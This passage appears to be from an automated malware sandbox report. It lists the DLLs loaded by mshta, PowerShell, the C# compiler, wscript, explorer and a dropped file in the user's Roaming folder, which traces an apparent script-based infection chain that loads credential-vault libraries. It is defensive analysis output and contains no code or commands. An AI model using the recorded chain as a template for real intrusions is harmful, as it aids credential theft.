              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
              Source: C:\Windows\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dll
              Source: C:\Users\user\AppData\Roaming\wihaduvSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\wihaduvSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\wihaduvSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\wihaduvSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wihaduvSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wihaduvSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
